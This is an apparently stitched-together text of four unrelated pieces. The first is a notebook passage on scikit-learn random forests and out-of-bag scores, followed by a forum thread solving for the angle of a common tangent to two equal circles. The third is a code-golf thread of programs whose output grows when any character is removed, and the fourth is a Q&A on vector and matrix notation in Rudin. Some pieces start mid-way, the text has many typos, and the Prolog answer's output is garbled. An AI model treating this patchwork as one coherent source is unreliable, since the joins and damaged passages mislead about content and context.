Indeed, $v \in V$ and $w = f(v) \in W$, we may apply the bijection $\Phi$ described above to associate $v$ to the $n$-tuple $(b_1,\dots,b_n) \in \mathbb R^n$, and $w$ to the $m$-tuple $(c_1,\dots,c_m) \in \mathbb R^m$, and then "tip" the tuples to their sides (make them "column vectors", i.e. matrices with one column). Having done this, it is easy to resort to the definition of matrix product and see that, if $(a_{ij})$ is the $m \times n$ matrix associated with $f$, we have $$\begin{bmatrix} c_1 \\ \vdots \\ c_m \end{bmatrix} = \begin{bmatrix} a_{11} & \cdots & a_{1m} \\ \vdots & \ddots & \vdots \\ a_{n1} & \cdots & a_{nm} \end{bmatrix} \begin{bmatrix} b_1 \\ \vdots \\ b_m \end{bmatrix}$$
You may apply this discussion in the case $V = \mathbb R^n$ and $W = \mathbb R^m$, which is the one relevant to analysis. Just notice that in these spaces there is an obvious choice of basis (the so-called standard or canonical basis), i.e. the tuples $\mathbf e_i$ that contain all zeros, except a $1$ in the $i$-th slot. In most cases, at least in analysis, matrices are associated to linear functions with the understanding that canonical bases have been chosen both in the domain and the codomain.
• I strongly suggest this playlist of videos by 3Blue1Brown, that will surely help you get a more intuitive understanding of this topic. youtube.com/playlist?list=PLZHQObOWTQDPD3MizzM2xVFitgF8hE_ab – giobrach Apr 23 '18 at 11:33
• Brilliant answer! The only this I would add is that, while some things about vector spaces match up with our intuition about arrows, the main "definition" of arrow "vectors" does not hold in general, i.e. vectors do not necessarily have magnitude or direction. If vectors do have magnitude, the space is called a normed space, and if they have direction, it is called an inner product space (which is also a normed space). – AlexanderJ93 Apr 29 '18 at 19:50
• What you point out in your comment is very important. I do not know why some college professors, mostly physicists and engineers, still insist that “scalars only have magnitude, vectors have magnitude and direction,” and so on. It’s just plain wrong, in general. They even clumsily try to extend these concepts to tensors of any rank... IMHO, anyone who needs to learn about tensors should be well versed with the rigorous theory of abstract vector spaces, enough to discard any such gross simplification. – giobrach Apr 29 '18 at 20:00
|
|
## DMOPC '14 Contest 6 P1 - Core Drill
View as PDF
Points: 3 (partial)
Time limit: 2.0s
Memory limit: 64M
Author:
Problem type
Simon got a new drill recently. Everyone knows that a drill is shaped like a right circular cone. Simon knows his drill has radius and height . But now he wants to calculate the volume. Write a program to help Simon!
#### Input Specification
The first line of input will have an integer .
The second line of input will have an integer .
#### Output Specification
The first line of output should have the volume of Simon's drill. The output will be accepted if it's within an absolute or relative error of .
#### Sample Input
3
5
#### Sample Output
47.12
#### Hint
is the volume of the right circular cone with radius and height .
• commented on Sept. 22, 2021, 2:06 p.m.
You need to use the iomanip library if working in C++. Using 3.14 as pi is fine, just make sure to declare the variables in the order they appear otherwise DMOJ might interpret it as incorrect.
• commented on Sept. 8, 2021, 12:30 p.m.
This is just a simple formula which can be: double ans = (355/339) r r * h; and in c++ use cout << fixed << setprecision(3) << ans << "\n";
• commented on Sept. 8, 2021, 1:21 p.m.
no spoilers :blobhammer:
• commented on Sept. 8, 2021, 7:39 a.m. edited
PI = 3.141592653589793
• commented on July 3, 2020, 11:27 p.m.
What is the value of π? I know it is 3.14159...
but will i round it off to 3.14?
• commented on July 4, 2020, 12:06 p.m. edit 2
If you read the output specification, it says in what cases your output will be accepted. In this case, it is fine to use 3.14 as π. If you have more questions, it would be easier to join the DMOJ Slack to get faster responses instead of commenting on each problem.
|
|
# Fourier transform of a supergausian
1. Aug 28, 2012
### modaniel
Hi,
I was wondering if anyone might know what the analytic fourier transform of a Super-Gaussian is?
cheers
2. Aug 28, 2012
### Mute
That depends on what you mean by "super-Gaussian" distribution. Do you mean fat-tailed distributions? (distributions with tails that fall off rather slowly compared to a Gaussian).
If so, then there are several kinds of fat tailed distributions, each with its own fourier transform. The fourier transform of the probability density function is just the characteristic function for the distribution, which are usually listed on the wikipedia page for the distribution of interest.
3. Aug 28, 2012
### modaniel
thanks mute for the reply. The supergaussian i refer to is the Aexp(-($\frac{x}{a}$)$^{2n}$) where n is positive an integer and is the order of the supergaussian.
4. Aug 28, 2012
### Mute
Hm, that looks tricky. Looking in the integral book Gradshteyn and Ryzhik, I found two useful integrals. The first is
$$\int_0^\infty dx~\exp(-x^\mu) = \frac{1}{\mu}\Gamma\left(\frac{1}{\mu}\right),$$
which holds for $\mbox{Re}(\mu) > 0$ and can be used to find the normalization constant of your distribution. This is integral 3.326-1 in the sixth edition.
There does not appear to be an integral for $\exp(-x^\mu+ix)$, so it's possible there may not be a closed form for the fourier transform. However, you could expand the imaginary exponential in a power series and perform the integral term-by-term to get a power series representation of the fourier transform. In this case, the following integral (3.326-2) is useful:
$$\int_0^\infty dx~x^m \exp(-\beta x^n) = \frac{\Gamma(\gamma)}{n\beta^\gamma},$$
where $\gamma = (m+1)/n$.
5. Aug 29, 2012
### Mute
I should note that a) the series won't actually be a power series (because the moments aren't powers of anything) and b) the series looks like it will be at best an asymptotic series, as $\Gamma((m+1)/n)$ will grow quite large as $m$ gets large, and so the sum won't actually converge.
6. Aug 31, 2012
### modaniel
Hi Mute, thanks for the replies. looks like i might have to stick to numerical transforms!
|
|
# A question about first order theories having only finite models
Does anyone know an example of a mathematically interesting first order theory $T$ such that the following conditions hold?
1. $T$ can be formalized in the classical predicate calculus.
2. It is provable in ZFC that $T$ is consistent and has no infinite models.
3. No upper bound is presently known for the cardinal numbers of the finite models of $T$, even though it has been proved that these models cannot be arbitrarily large.
-
Take any finite set of finite models of finite signature. The first order theory of that set is what you need (if and only if). – Mark Sapir Oct 7 '11 at 22:24
@Mark: What about (3)? – Emil Jeřábek Oct 7 '11 at 22:53
Not overly interesting interesting, but one could encode some sort of open problem into the size of available models. For example, take sigma to be the sentence "there are at most BB(n) elements," where n is your favorite number and BB(n) is the nth busy beaver number. Obviously you could fit this to whatever natural numbers problem you like, but it's a bit contrived. – Richard Rast Oct 7 '11 at 23:17
What I wanted to say is that your question is about first order theories of finite sets of finite models. Condition (3) is equivalent to asking that the size of the set should be unknown. There are lots of examples. Say, Vinogradov proved that almost all natural numbers are sums of three primes. Consider the set of all natural numbers which are not sums of three primes. This set is finite but we do not know if it is empty. A "number" can be easily viewed as a model in an appropriate signature. So this is (or easily converts to) an example of your theory. – Mark Sapir Oct 7 '11 at 23:28
Thanks for your answers. Using BB(n) may be just what is needed, provided that BB(n) was definable within the theory T. The closest resemlance to T that I could think of was to imagine a "theory" of simple "sporadic" groups before the discovery of the Monster. The only problem was that I do not know what axioms characterize "sporadic" groups and I do not know how to prove that there are no infinite "sporadic" groups. – Garabed Gulbenkian Oct 10 '11 at 14:44
Really, this is just a comment, but it's way too long:
First, a quick observation: assuming your language is finite, every example must be finitely axiomatizable. (Although that finite axiomatization may not be known.)
I want to give two potentially interesting classes of examples: one having a Ramsey-theoretic flavor, and the other coming from complexity theory. I'm hampered by the fact that I don't really know anything about either subject, so what follows is purely speculative.
In model theory, often we want to construct models of a given theory with nice combinatorial patterns - e.g., with indiscernible sequences of a given order-type, etc. I don't know if this is true, but I suspect that in finite model theory, finite combinatorial patterns are also important. Now, suppose I'm given a theory $T$ and a Ramsey-type theorem "Every sufficiently large structure exhibits pattern $P$." Then the 'bad' models of $\varphi$ are bounded in size - and hence the class of them is axiomatized by a single formula $\varphi$, even if $T$ is not finitely axiomatizable - but no upper bound on this size need be known. Even if an upper bound is known, there is a good chance (Ramsey theory being what it is) that it is truly terrible.
Now, I suspect that these classes of models are interesting only insofar as they make finite model theory difficult, that is, such a class might be relevant for studying the finite model theory of the corresponding theory $T$ but I doubt they are particularly interesting on their own. However, I could be wrong. (I could also be wrong that anything like this is of interest in finite model theory.) Hopefully, someone who actually knows finite model theory will set me straight on this.
Now let me give a class of potential examples coming from complexity theory.
Let $X$ be a set in some 'large' complexity class, say $NEXPTIME$. Call a Turing machine (deterministic or non) $\Phi$ an $X$-guesser if $\Phi(n)=1$ implies $n\in X$; that is, $\Phi$ may not compute $X$, but it never gives false positives.
There may be a collection $\{\Phi_i: i\in\omega\}$ of particularly nice $X$-guessers with extremely small runtime; maybe these arise in trying to 'build $X$ from below' to get a better upper bound on the complexity of $X$. If so, then if $X$ is sufficiently natural and these runtimes really are sufficiently small, we can probably prove that each $\Phi_i$ outputs 1 only finitely many times. Then, for each $i$, the set $X_i=\{n: \Phi_i(n)=1\}$ is a finite set of natural numbers; but upper bounds for these may not be known.
What does this have to do with finite models? Well, take the case where $X\in NEXPTIME$. An old result of ??? shows that the sets of the form $\{n: \exists A\models\varphi (\vert A\vert=n)\}$ (called (finite) spectra) are precisely the sets in $NEXPTIME$. So, given this sequence of sets $X_i$, starting with a formula $\varphi$ corresponding to $X$ we get formulas $\varphi_i$ corresponding to $X_i$ for each $i$. At this point, it's in principle possible that the structure of these formulas can be attacked by finite model theory more efficiently than the sets $X_i$ can be attacked from complexity theory. (Although to the best of my knowledge, this sort of idea isn't nearly as effective as one would hope.) So this would potentially give an interesting sequence of examples of your phenomenon.
I'm sticking to sequences of examples, rather than individual examples, here because I can't imagine a single $X$-guesser with such small runtime being that interesting on its own. Admittedly, I'm also very dubious that any of this is interesting, but it passes my own 'smell' test at least for now.
-
|
|
## Thinking Mathematically (6th Edition)
$10^4; \\10^3; \\10^2; \\10; \\1$
Note that: $74716 \\= 70,000 + 4,000 + 700 + 10 + 6 \\=(7\times 10000) + (4\times 1000) + (7 \times 100) +(1 \times 10) + (6 \times 1) \\=(7 \times 10^4) + (4 \times 10^3) + (7 \times 10^2) + (1 \times 10) + (6 \times 1)$ Thus, the missing expressions in the given statement (in order) are: $10^4; \\10^3; \\10^2; \\10; \\1$
|
|
# Stieltjes Integrals Considered as Lengths
• Karl Menger
Chapter
## Abstract
The Stieltjes integral
$$\begin{array}{*{20}{c}} {\int\limits_{a}^{b} {f(x)dg(x)} } & {or briefly, \int\limits_{a}^{b} {fdg} }\\\end{array}$$
is defined as follows: We divide the interval [a, b] into a finite number of intervals
$$a = {{x}_{0}} < {{x}_{1}} <\ldots< {{x}_{{n - 1}}} < {{x}_{n}} = b.$$
|
|
### 水溶液中碳纳米管的表面增强拉曼光谱研究
1. 北京大学化学与分子工程学院 北京分子科学国家实验室 纳米器件物理与化学教育部重点实验室 稀土材料化学及应用国家重点实验室 北京 100871
• 收稿日期:2012-05-11 出版日期:2012-07-28 发布日期:2012-06-19
• 通讯作者: 李彦
• 基金资助:
项目受科技部(No. 2011CB933003)和国家自然科学基金(Nos. 21125103, 11179011)资助.
### Surface-Enhanced Raman Spectroscopy of Carbon Nanotubes in Aqueous Solution
Niu Yang, Liu Qinghai, Yang Juan, Gao Dongliang, Qin Xiaojun, Luo Da, Zhang Zhenyu, Li Yan
1. Beijing National Laboratory for Molecular Sciences, Key Laboratory for the Physics and Chemistry of Nanodevices, State Key Laboratory of Rare Earth Materials Chemistry and Applications, Peking University, Beijing 100871, China
• Received:2012-05-11 Online:2012-07-28 Published:2012-06-19
• Supported by:
Project supported by the Ministry of Science and Technology of China (No. 2011CB933003) and the National Natural Science Foundation of China (Nos. 21125103, 11179011).
Carbon nanotubes (CNTs) exhibit intrinsic spectroscopic properties and are potential Raman and NIR florescence probes for bioimaging. However, the weak Raman intensity greatly obstructs such applications. Surface-enhanced Raman scattering (SERS) has shown to be an effective way to increase the Raman signal. SERS has been widely studied for solid samples. However, solid state is distinctly different from the environment in biosystems. Herein, we studied the SERS of Au- nanoparticle-decorated CNTs in aqueous solution, which offers a similar environment to biosystems. We found that the functionalization of CNTs with-SH groups can improve the attachment of Au nanoparticles on tube surfaces thus benefit the SERS effect. The particle size is another important issue for SERS. Particles of 50 nm show much stronger enhancement than those of 12 nm. The Raman intensity of CNTs increases with the increase of the concentration of Au nanoparticles. Hexamethylene diamine molecules can act as the bi-linkers between Au nanoparticles, compressing the interparticle distance. This was proved by the red-shift of the band at ca. 540 nm and the appearance of a broad band around 700 nm in the absorption spectra of Au nanoparticles. Therefore the addition of hexamethylene diamine can further increase the Raman signal of CNTs by the strong coupling of the surface plasma from the Au nanoparticles with very small interparticle distances. Two kinds of commonly used small molecule Raman probes p-aminothiophenol and Rhodamine B both show remarkably enhanced Raman intensity when added to the aqueous dispersion of Au/CNT hybrids. This shows that these Raman probe molecules can absorb onto the Au/CNT hybrids and their Raman spectra are able to be greatly enhanced by Au nanoparticles decorated on CNTs. Because various Raman bands from either CNTs or Raman probe molecules can be used for Raman imaging, this kind of Raman probe molecule/Au/CNT tri-component hybrid systems may be used as a potential nanostructured platform for multiplexed Raman imaging based on SERS effect.
|
|
Function and Algebra Concepts questions are available in the following grade levels:
# Function and Algebra Concepts Questions - All Grades
Create printable tests and worksheets from Function and Algebra Concepts questions. Select questions to add to a test using the checkbox above each question. Remember to click the add selected questions to a test button before moving to another page.
1 2 3 4 ... 216
Grade 9 :: Algebraic Expressions by Barraza
Simplify the expression $6m + 10 - 10m$
1. $4m + 10$
2. $-4m + 10$
3. $16m + 10$
4. $6m$
Grade 9 :: Functions by Barraza
Grade 9 :: Algebraic Expressions by Barraza
simplify -2 (3x + 6)
1. -6x - 12
2. -6x + 12
3. -18x
4. 6x - 12
Grade 9 :: Functions by Barraza
Simplify the following expression.
$3y^2 - 6y + 2 + 3y^2 + 8y$
1. $8y^2 +2$
2. $6y^2 +2 +14y$
3. $6y^2 + 2 - 14$
4. $6y^2 +2y + 2$
Grade 4 :: Linear Equations by LBeth
Grade 9 :: Linear Equations by rknight
Find the slope and y-intercept. 5x + 2y = -8
1. m = -5/2 and b = -4
2. m = -4 and b = -5
3. m = 5 and b = 2
4. m = 2 and b = 5
Grade 12 :: Function and Algebra Concepts by bscott22
$7/8$ as a decimal
1. 1.125
2. 0.625
3. 0.875
4. 1.25
Grade 6 :: Algebraic Expressions by LBeth
Which expression represents "$y$ less than one-half"?
1. $y + 1/2$
2. $y - 1/2$
3. $1/2 + y$
4. $1/2 - y$
Grade 9 :: Algebraic Expressions by Barraza
Which of the following is showing like terms?
1. $-3 , -6x, -9y, -10z$
2. $x, 5x, 6xy, 10x^2$
3. $5y, 5x, 5z, 5m$
4. $y, -8y, .7y, -100y$
Grade 3 :: Inequalities by LBeth
Which correctly compares the pictures?
1. $4>2$
2. $4<2$
3. $4 = 2$
Grade 3 :: Inequalities by LBeth
Which correctly compares the pictures?
1. $3>4$
2. $3<4$
3. $3=4$
Grade 9 :: Algebraic Expressions by Barraza
$3y + 8$ is an example of a
1. monomial
2. binomial
3. trinomial
4. polynomial
Grade 9 :: Algebraic Expressions by Barraza
Grade 6 :: Inequalities by LBeth
Grade 6 :: Inequalities by Piddydink
Greater than or equal to
1. $<=$
2. $>$
3. $<$
4. $>=$
Grade 3 :: Inequalities by LBeth
$>$
1. True
2. False
|
|
# University of South Carolina High School Math Contest/1993 Exam/Problem 26
## Problem
Let $n=1667$. Then the first nonzero digit in the decimal expansion of $\sqrt{n^2 + 1} - n$ is
$\mathrm{(A) \ }1 \qquad \mathrm{(B) \ }2 \qquad \mathrm{(C) \ }3 \qquad \mathrm{(D) \ }4 \qquad \mathrm{(E) \ }5$
## Solution
The given expression is between 0 and 1, so we only need to worry about the decimal expansion of $\sqrt{n^{2}+1}$ and ignore the integer part of the result. We have $(1667^{2}+1)^{1/2}$. Using the extended Binomial Theorem, we have that $\displaystyle {1/2\choose 0} (1667) + {1/2\choose 1} \left(\frac 1{1667}\right) + \cdots$. Now we only have to look at the second term since all the following terms will be too small to affect the first nonzero digit of the decimal expansion. We see that $\frac{1}{2 \cdot 1667}=.00029\ldots$. The answer is $2$.
Alternatively, if you don't know the extended binomial theorem, we can say $\sqrt{n^2 + 1} - n = \epsilon$. Then $\sqrt{n^2 + 1} = n + \epsilon$ so $n^2 + 1 = n^2 + 2n\epsilon + \epsilon^2$, so $\epsilon^2 + 2n\epsilon = 1$. Because $n$ is large, $\epsilon$ is very small, so if we write $\epsilon = \frac{1}{2n} - \frac{\epsilon^2}{2n}$, we may disregard the second term. The result follows as in the previous solution.
|
|
# Circuit Theory/Inductors
An inductor is a coil of wire that stores energy in the form of a magnetic field. The magnetic field depends on current flowing to "store energy."
If the current stops, the magnetic field collapses and creates a spark in the device that is opening the circuit. The large generators found in electricity generation can create huge currents. Turning them off can be dangerous MIT EMF Youtube video. There are no dangers storing them.
## Contents
### Inductance
Inductance is the capacity of an inductor to store energy in the form of a magnetic field. Inductance is measured by units called "Henries" which is abbreviated with a capital "H," and the variable associated with inductance is "L".
Inductance is the ratio of magnetic flux (symbol ${\displaystyle \Phi _{B}}$) to current:
${\displaystyle L=\Phi _{B}/i}$
${\displaystyle \Phi _{B}}$ measures the strength of a magnetic field just like charge measures the strength of an electric field.
### Inductor Terminal Relation
The relationship between inductance, current, and voltage through an inductor is given by the formula:
${\displaystyle v=L{\frac {di}{dt}}}$
### Inductor Safety
Inductors found in power plants can store energy, but inductors found at room temperature will not store energy. An isolated inductor in storage can not kill someone like a capacitor can.
Inductors do cause problems. The first is economic. A good inductor is much more expensive than a capacitor. In some situations, a collection of other components can replace an inductor at less cost. Typical inductors are built with copper which increases in cost as supply on earth dwindles.
Inductors can create spikes and sparks video when turning off that can destroy other electrical components. They can destroy switches. They can vaporize metal.
The biggest inductors at room temperature are found in electric motors. When motors are turned on or off they create what is called a "back EMF." Ideally Back EMF is a voltage spike of infinite voltage. Diodes, capacitors and resistors are used to turn the back EMF into heat on discharge may make starting up the motor a problem. Some electronic speed controlers (ESCs) in UAVs and quadcopters pulse the motor to deliberately and measure the back EMF to figure out what direction the motor is going to spin in. This reduces the need of hall-effect probes and thus reduces the cost of the motor.
### Inductor Example
Question: Given the current through a 10mH inductor is ${\displaystyle i(t)=5t*e^{-1000t}}$ amps, what is the voltage?
Solution: No need to know the initial conditions because the solution is a derivative: ${\displaystyle v(t)=Ldi/dt}$.
Using Wolfram Alpha, the solution is ${\displaystyle v(t)=.01*e^{-1000t}(5-5000t)}$ volts.
|
|
# How to we do the inverse of y=(x-1)^2 ?
1. May 8, 2005
### cmab
How to we do the inverse of y=(x-1)^2 ?
Would it be x = sqrt(y) +1 ?
2. May 8, 2005
### Jameson
Let's see.
$$y = (x-1)^2$$
Now switching x and y we get
$$x = (y-1)^2$$
$$\sqrt{x} = y - 1$$
$$y = \sqrt{x} + 1$$
When you find inverses, you usually want to put the inverse in terms of the given variable if possible. Sometimes you'll see, it is quite impossible.
Example: Find the inverse of $$y = x^3-x$$
Jameson
3. May 8, 2005
### cmab
but in my problem, it must have respect to y....
How about the reciprocal of x=2, would it be y=2 ? Just swapping the variable.
4. Jul 21, 2010
### dimitri151
Re: Reciprocal
The issue with finding the inverse of x=2 is that x=2 isn't a function. A function is an ordered tuple from one set to another. x=2 only refers to an one element of one set. Furthermore, if you want your function to have an inverse the rule has to have other requirements. It has to be bijective, which means it has to be both injective and surjective. Hence $$y = x^3-x$$
has no inverse since solving for x gives multiple functions.
|
|
X ϵ be two open subsets of S Suppose that and is called locally connected if and only if for and ¯ A topological space X is said to be disconnected if it is the union of two disjoint nonempty open sets. ⊆ as GraphData[g, Le dictionnaire des synonymes est surtout dérivé du dictionnaire intégral (TID). {\displaystyle V} if there is a path joining any two points in X. V Hence {\displaystyle y\in X} ( {\displaystyle \gamma :[a,b]\to X} Using pathwise-connectedness, the pathwise-connected component containing is the set of all pathwise-connected … are in {\displaystyle X\setminus Y} γ The resulting space is a T1 space but not a Hausdorff space. = ) and Graphs have path connected subsets, namely those subsets for which every pair of points has a path of edges joining them.But it is not always possible to find a topology on the set of points which induces the same connected sets. ⊆ U U In the star topology, all the computers connect with the help of a hub. The connected components of a space are disjoint unions of the path-connected components (which in general are neither open nor closed). , where {\displaystyle U,V} O S A subset of a topological space X is a connected set if it is a connected space when viewed as a subspace of X. For instance, the space resulting from the deletion of an infinite line from the plane is not connected. = Finally, every element in ∅ → V the set of such that there is a continuous path Practice online or make a printable study sheet. U γ (ii) Each equivalence class is a maximal connected subspace of $X$. T {\displaystyle y\in W\cap O\cap (S\cup T)=U\cap V} is connected. Renseignements suite à un email de description de votre projet. {\displaystyle (0,1)\cup (2,3)} is disconnected, then the collection S , ) Proposition (continuous image of a connected space is connected): Let {\displaystyle V} 1 ∖ ( → ϵ γ Une fenêtre (pop-into) d'information (contenu principal de Sensagent) est invoquée un double-clic sur n'importe quel mot de votre page web. ∩ B S f ) ). Now we know that: The two sets in the last union are disjoint and open in W {\displaystyle i} V Example (the closed unit interval is connected): Set In this type of topology all the computers are connected to a single hub through a cable. 0 0 To wit, there is a category of connective spaces consisting of sets with collections of connected subsets satisfying connectivity axioms; their morphisms are those functions which map connected sets to connected sets (Muscat & Buhagiar 2006). ] = {\displaystyle \gamma :[a,b]\to X} Hence ∪ , {\displaystyle f(X)} which is path-connected. Proof: We prove that being contained within a common connected set is an equivalence relation, thereby proving that → Hence, being in the same component is an X = such that 1 The resulting space, with the quotient topology, is totally disconnected. {\displaystyle B_{\epsilon }(\eta )\subseteq U} Set , Looking for Connected component (topology)? = : f A topological space X is said to be disconnected if it is the union of two disjoint non-empty open sets. x W Then one can show that the graph is connected (in the graph theoretical sense) if and only if it is connected as a topological space. X Hint: (i) I guess you're ok with $x \sim x$ and $x\sim y \Rightarrow y \sim x$. Γ {\displaystyle S} ) {\displaystyle U} X such that {\displaystyle U\cap V=\emptyset } V ∪ X are connected. = B Participer au concours et enregistrer votre nom dans la liste de meilleurs joueurs ! . of If the topological space has at least connected components for some , we find by induction a decomposition of as a disjoint union of nonempty open and closed subsets of . is connected with respect to its subspace topology (induced by {\displaystyle \mathbb {R} } {\displaystyle \mathbb {R} } {\displaystyle \gamma (b)=y}
Misconduct Movie Wiki, Blonde Ambition Music, What Happened To Jud Paynter, Asterix And The Golden Sickle Read Online, Lifes A Dance Chordsbad For You Lyrics, Sanju Producer, Network Layer Functions, Promise Not To Tell, Apple Pencil Alternatives 2020, Sunday Creek Coal Company History, Ipad Air 2 16gb Price,
|
|
# NAG Library Routine Document
## 1Purpose
c05ayf locates a simple zero of a continuous function in a given interval using Brent's method, which is a combination of nonlinear interpolation, linear extrapolation and bisection.
## 2Specification
Fortran Interface
Subroutine c05ayf ( a, b, eps, eta, f, x,
Integer, Intent (Inout) :: iuser(*), ifail Real (Kind=nag_wp), External :: f Real (Kind=nag_wp), Intent (In) :: a, b, eps, eta Real (Kind=nag_wp), Intent (Inout) :: ruser(*) Real (Kind=nag_wp), Intent (Out) :: x
#include nagmk26.h
void c05ayf_ (const double *a, const double *b, const double *eps, const double *eta, double (NAG_CALL *f)(const double *x, Integer iuser[], double ruser[]),double *x, Integer iuser[], double ruser[], Integer *ifail)
## 3Description
c05ayf attempts to obtain an approximation to a simple zero of the function $f\left(x\right)$ given an initial interval $\left[a,b\right]$ such that $f\left(a\right)×f\left(b\right)\le 0$. The same core algorithm is used by c05azf whose specification should be consulted for details of the method used.
The approximation $x$ to the zero $\alpha$ is determined so that at least one of the following criteria is satisfied:
(i) $\left|x-\alpha \right|\le {\mathbf{eps}}$, (ii) $\left|f\left(x\right)\right|\le {\mathbf{eta}}$.
## 4References
Brent R P (1973) Algorithms for Minimization Without Derivatives Prentice–Hall
## 5Arguments
1: $\mathbf{a}$ – Real (Kind=nag_wp)Input
On entry: $a$, the lower bound of the interval.
2: $\mathbf{b}$ – Real (Kind=nag_wp)Input
On entry: $b$, the upper bound of the interval.
Constraint: ${\mathbf{b}}\ne {\mathbf{a}}$.
3: $\mathbf{eps}$ – Real (Kind=nag_wp)Input
On entry: the termination tolerance on $x$ (see Section 3).
Constraint: ${\mathbf{eps}}>0.0$.
4: $\mathbf{eta}$ – Real (Kind=nag_wp)Input
On entry: a value such that if $\left|f\left(x\right)\right|\le {\mathbf{eta}}$, $x$ is accepted as the zero. eta may be specified as $0.0$ (see Section 7).
5: $\mathbf{f}$ – real (Kind=nag_wp) Function, supplied by the user.External Procedure
f must evaluate the function $f$ whose zero is to be determined.
The specification of f is:
Fortran Interface
Function f ( x,
Real (Kind=nag_wp) :: f Integer, Intent (Inout) :: iuser(*) Real (Kind=nag_wp), Intent (In) :: x Real (Kind=nag_wp), Intent (Inout) :: ruser(*)
#include nagmk26.h
double f (const double *x, Integer iuser[], double ruser[])
1: $\mathbf{x}$ – Real (Kind=nag_wp)Input
On entry: the point at which the function must be evaluated.
2: $\mathbf{iuser}\left(*\right)$ – Integer arrayUser Workspace
3: $\mathbf{ruser}\left(*\right)$ – Real (Kind=nag_wp) arrayUser Workspace
f is called with the arguments iuser and ruser as supplied to c05ayf. You should use the arrays iuser and ruser to supply information to f.
f must either be a module subprogram USEd by, or declared as EXTERNAL in, the (sub)program from which c05ayf is called. Arguments denoted as Input must not be changed by this procedure.
Note: f should not return floating-point NaN (Not a Number) or infinity values, since these are not handled by c05ayf. If your code inadvertently does return any NaNs or infinities, c05ayf is likely to produce unexpected results.
6: $\mathbf{x}$ – Real (Kind=nag_wp)Output
On exit: if ${\mathbf{ifail}}={\mathbf{0}}$ or ${\mathbf{2}}$, x is the final approximation to the zero. If ${\mathbf{ifail}}={\mathbf{3}}$, x is likely to be a pole of $f\left(x\right)$. Otherwise, x contains no useful information.
7: $\mathbf{iuser}\left(*\right)$ – Integer arrayUser Workspace
8: $\mathbf{ruser}\left(*\right)$ – Real (Kind=nag_wp) arrayUser Workspace
iuser and ruser are not used by c05ayf, but are passed directly to f and may be used to pass information to this routine.
9: $\mathbf{ifail}$ – IntegerInput/Output
On entry: ifail must be set to $0$, $-1\text{ or }1$. If you are unfamiliar with this argument you should refer to Section 3.4 in How to Use the NAG Library and its Documentation for details.
For environments where it might be inappropriate to halt program execution when an error is detected, the value $-1\text{ or }1$ is recommended. If the output of error messages is undesirable, then the value $1$ is recommended. Otherwise, if you are not familiar with this argument, the recommended value is $0$. When the value $-\mathbf{1}\text{ or }\mathbf{1}$ is used it is essential to test the value of ifail on exit.
On exit: ${\mathbf{ifail}}={\mathbf{0}}$ unless the routine detects an error or a warning has been flagged (see Section 6).
## 6Error Indicators and Warnings
If on entry ${\mathbf{ifail}}=0$ or $-1$, explanatory error messages are output on the current error message unit (as defined by x04aaf).
Errors or warnings detected by the routine:
${\mathbf{ifail}}=1$
On entry, ${\mathbf{a}}=〈\mathit{\text{value}}〉$ and ${\mathbf{b}}=〈\mathit{\text{value}}〉$.
Constraint: ${\mathbf{a}}\ne {\mathbf{b}}$.
On entry, ${\mathbf{eps}}=〈\mathit{\text{value}}〉$.
Constraint: ${\mathbf{eps}}>0.0$.
On entry, ${\mathbf{f}}\left({\mathbf{a}}\right)$ and ${\mathbf{f}}\left({\mathbf{b}}\right)$ have the same sign with neither equalling $0.0$: ${\mathbf{f}}\left({\mathbf{a}}\right)=〈\mathit{\text{value}}〉$ and ${\mathbf{f}}\left({\mathbf{b}}\right)=〈\mathit{\text{value}}〉$.
${\mathbf{ifail}}=2$
No further improvement in the solution is possible. eps is too small: ${\mathbf{eps}}=〈\mathit{\text{value}}〉$. The final value of x returned is an accurate approximation to the zero.
${\mathbf{ifail}}=3$
The function values in the interval $\left[{\mathbf{a}},{\mathbf{b}}\right]$ might contain a pole rather than a zero. Reducing eps may help in distinguishing between a pole and a zero.
${\mathbf{ifail}}=-99$
See Section 3.9 in How to Use the NAG Library and its Documentation for further information.
${\mathbf{ifail}}=-399$
Your licence key may have expired or may not have been installed correctly.
See Section 3.8 in How to Use the NAG Library and its Documentation for further information.
${\mathbf{ifail}}=-999$
Dynamic memory allocation failed.
See Section 3.7 in How to Use the NAG Library and its Documentation for further information.
## 7Accuracy
The levels of accuracy depend on the values of eps and eta. If full machine accuracy is required, they may be set very small, resulting in an exit with ${\mathbf{ifail}}={\mathbf{2}}$, although this may involve many more iterations than a lesser accuracy. You are recommended to set ${\mathbf{eta}}=0.0$ and to use eps to control the accuracy, unless you have considerable knowledge of the size of $f\left(x\right)$ for values of $x$ near the zero.
## 8Parallelism and Performance
c05ayf is not threaded in any implementation.
The time taken by c05ayf depends primarily on the time spent evaluating f (see Section 5).
If it is important to determine an interval of relative length less than $2×{\mathbf{eps}}$ containing the zero, or if f is expensive to evaluate and the number of calls to f is to be restricted, then use of c05azf is recommended. Use of c05azf is also recommended when the structure of the problem to be solved does not permit a simple f to be written: the reverse communication facilities of c05azf are more flexible than the direct communication of f required by c05ayf.
## 10Example
This example calculates an approximation to the zero of ${e}^{-x}-x$ within the interval $\left[0,1\right]$ using a tolerance of ${\mathbf{eps}}=\text{1.0E−5}$.
### 10.1Program Text
Program Text (c05ayfe.f90)
None.
### 10.3Program Results
Program Results (c05ayfe.r)
© The Numerical Algorithms Group Ltd, Oxford, UK. 2017
|
|
Definitions
# Algorithms for calculating variance
Algorithms for calculating variance play a major role in statistical computing. A key problem in the design of good algorithms for this problem is that formulas for the variance may involve sums of squares, which can lead to numerical instability as well as to arithmetic overflow when dealing with large values.
## I. Naïve algorithm
The formula for calculating the variance of an entire population of size n is:
$sigma^2 = displaystylefrac \left\{sum_\left\{i=1\right\}^\left\{n\right\} x_i^2 - \left(sum_\left\{i=1\right\}^\left\{n\right\} x_i\right)^2/n\right\}\left\{n\right\}. !$
The formula for calculating an unbiased estimate of the population variance from a finite sample of n observations is:
$s^2 = displaystylefrac \left\{sum_\left\{i=1\right\}^\left\{n\right\} x_i^2 - \left(sum_\left\{i=1\right\}^\left\{n\right\} x_i\right)^2/n\right\}\left\{n-1\right\}. !$
Therefore a naive algorithm to calculate the estimated variance is given by the following pseudocode:
`n = 0`
`sum = 0`
`sum_sqr = 0`
`foreach x in data:`
` n = n + 1`
` sum = sum + x`
` sum_sqr = sum_sqr + x*x`
`end for`
`mean = sum/n`
`variance = (sum_sqr - sum*mean)/(n - 1)`
This algorithm can easily be adapted to compute the variance of a finite population: simply divide by n instead of n − 1 on the last line.
Because `sum_sqr` and `sum * mean` can be very similar numbers, the precision of the result can be much less than the inherent precision of the floating-point arithmetic used to perform the computation. This is particularly bad if the variance is small relative to the sum of the numbers.
